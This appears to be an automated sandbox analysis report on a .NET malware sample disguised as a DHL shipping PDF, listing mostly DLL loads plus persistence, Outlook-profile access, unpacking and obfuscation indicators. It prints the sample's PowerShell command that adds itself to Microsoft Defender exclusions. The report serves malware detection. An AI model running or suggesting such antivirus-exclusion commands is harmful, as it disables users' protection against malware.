Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Section loaded: iconcodecservice.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll

Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Data Obfuscation

.NET source code contains potential unpacker

Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3bc5820.1.raw.unpack, zYXs3Vc364X6vlA5mA.cs	.Net Code: kpvg60dcHx System.Reflection.Assembly.Load(byte[])
Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.8d10000.5.raw.unpack, zYXs3Vc364X6vlA5mA.cs	.Net Code: kpvg60dcHx System.Reflection.Assembly.Load(byte[])

Suspicious powershell command line found

Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe"
Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe"			Jump to behavior

Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe

Static PE information: 0xC276B42A [Sun May 21 02:27:54 2073 UTC]

Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Code function: 9_2_057CD3D3 push eax; iretd		9_2_057CD3D9
Source: C:\Users\user\AppData\Roaming\PZgkJsntUXo.exe	Code function: 9_2_057CCD20 push eax; retf		9_2_057CCD21

Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe	Static PE information: section name: .text entropy: 7.66966852362325
Source: PZgkJsntUXo.exe.0.dr	Static PE information: section name: .text entropy: 7.66966852362325

Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3bc5820.1.raw.unpack, eoqqtNpdSyBDwHpxJp.cs	High entropy of concatenated method names: 'GjAYdmnG4L', 'MXiYBUrFKC', 'umCYKUsffC', 'Q9ZY3GCUvp', 'onMYTOL6fA', 'c9CYc1eyvg', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3bc5820.1.raw.unpack, tVxHF7LFhjSrdoutck.cs	High entropy of concatenated method names: 'IXkKH5yBRq', 'D1VK4TOHnA', 'x6fKBaDemW', 'D8FK3IZYZj', 'AdjKcNg9J3', 'ICUBSSNRM3', 'xJ4BlgpeSG', 'jxcBRsS2km', 'BF0By7ocjR', 'xDwB7h2oq8'
Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3bc5820.1.raw.unpack, SpU0hSgfHZEdjdtoNO.cs	High entropy of concatenated method names: 's5Ba3EtGHp', 'hjLacxTkv1', 'jOcaneC4WP', 'gsDa8uR4lE', 'TnNas1CoVx', 'eF7a9FhjSr', 'V5AEObZkbwbUKBEYZO', 'hsbDdQppkUPgRcOs3j', 'tKHhKO3fmvsiOIuaro', 'w84aaBr9pT'
Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3bc5820.1.raw.unpack, wCcghWl7GAa7Es62jP.cs	High entropy of concatenated method names: 'ui4Mykl93m', 'X5hMpmQvH2', 'gstb58usmS', 'RpgbavPODS', 'hpBMAYVKEx', 'CSjMFU2sol', 'vUdMZHXTIV', 'lOpMi5Zast', 'QW8MkpVFCh', 'S6lM07nyJ5'
Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3bc5820.1.raw.unpack, pvTiJU0OEZ0d0H2dOW.cs	High entropy of concatenated method names: 'ToString', 'ENE9APLWUv', 'IKl9GyOncS', 'g8x9uyx8Pb', 'TMw9X8aYFd', 'u3R9NaaGtT', 'XQW9IEsQW4', 'fn49tjRHYD', 'V2k9CLopGR', 'dDP9QOAftk'
Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3bc5820.1.raw.unpack, S5QTVe7HZ4oxamuVRL.cs	High entropy of concatenated method names: 'IvITL1nwdU', 'xJFTGaX6mG', 'aWnTueCTWT', 'mqhTXSVUUa', 'RiWTNBuHQr', 'ieiTIrO5lS', 'ebpTtEiry5', 'H6qTC9k24U', 'FWfTQGU0RC', 'w2kTWBfROl'
Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3bc5820.1.raw.unpack, Xjno8p4yVG3t2NYqeG.cs	High entropy of concatenated method names: 'Dispose', 'KaYa7GUEEf', 'vjumGKxA06', 'tXMmJQdmvo', 'PVwapYRvyT', 'ko1azZ6X2t', 'ProcessDialogKey', 'oG0m55QTVe', 'eZ4maoxamu', 'lRLmmHoqqt'
Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3bc5820.1.raw.unpack, O9dRk1vCUwiGNgpmU6.cs	High entropy of concatenated method names: 'y1yMnHeqCm', 'h4yM80FM1J', 'ToString', 'JXTMPbysLu', 'xnBM4FbsRE', 'dmBMdNKPTN', 'QgNMBdeQMn', 'lmcMKkg7pt', 'Cr4M30hrLu', 'kwCMccDWaG'
Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3bc5820.1.raw.unpack, zYXs3Vc364X6vlA5mA.cs	High entropy of concatenated method names: 'vw3OH0Iurc', 'I7KOPY5IRN', 'Yt2O4VYoHF', 'X62OdlXpJa', 'rpSOBkW1TK', 'YLeOKA0cfm', 'rneO3Rcprk', 'QcmOc1QLcn', 'MpoOVkZFbE', 'LGUOncn1oX'
Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3bc5820.1.raw.unpack, JNAsw32OceC4WP4sDu.cs	High entropy of concatenated method names: 'xjCdeV5tTa', 'laxd1tqCoo', 'T19dfrPlwQ', 'smPd2JaUki', 'Ta6dsfPGvx', 'SXsd9urI4R', 'DDYdMPV4y2', 'zcfdbgyWd4', 'OOTdTeehAD', 'JmsdYISyHe'
Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3bc5820.1.raw.unpack, hEtGHpfBjLxTkv1wUN.cs	High entropy of concatenated method names: 'eff4i2VKmW', 'Oav4kinm0h', 'yZ040cVNQ5', 'FmT4vopAps', 'psA4SNBMPR', 'XTd4lGURhs', 'VnS4RQfbkZ', 'F2P4ybC6lr', 'NcN47xxduS', 'Bxs4p0MB28'
Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3bc5820.1.raw.unpack, GvF2KIaaAJ3PUFTtlX9.cs	High entropy of concatenated method names: 'HlfYpiprfd', 'nDnYzO7HT7', 'N7xo5lNprx', 'GYJoaBH2ux', 'RT8omlkMtN', 'KlPoOkiWLo', 'FOKog4Duwq', 'xMVoHn0IAn', 'xs6oPdVwjI', 'LxUo4tMSTU'
Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3bc5820.1.raw.unpack, mqbZAsRrAIaYGUEEfZ.cs	High entropy of concatenated method names: 'YvdTsjsq3E', 'GlGTMSKhIU', 'prfTTeisgU', 'EpkToIKsrd', 'jk4TEL0jNt', 'x7ATqUex49', 'Dispose', 'AZ0bP7FN8d', 'z76b4YIp1L', 'LDVbdV9n7a'
